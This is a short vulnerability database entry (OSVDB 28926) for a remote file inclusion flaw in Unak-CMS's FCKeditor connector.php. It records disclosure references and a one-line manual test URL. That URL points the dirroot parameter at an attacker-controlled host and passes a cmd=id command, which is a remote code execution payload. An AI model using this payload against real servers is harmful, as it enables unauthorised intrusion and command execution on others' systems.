Unak-CMS connector.php dirroot Variable Remote File Inclusion

2006-09-16T15:18:54
ID OSVDB:28926
Type osvdb
Reporter OSVDB
Modified 2006-09-16T15:18:54

Description

Manual Testing Notes

http://[target]/[Script Path]/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=http://[attacker]?&cmd=id

References:

Vendor URL: http://www.unak.net/ Secunia Advisory ID:21957 Related OSVDB ID: 28927 Generic Exploit URL: http://milw0rm.com/exploits/2380 FrSIRT Advisory: ADV-2006-3657 CVE-2006-4890 Bugtraq ID: 20070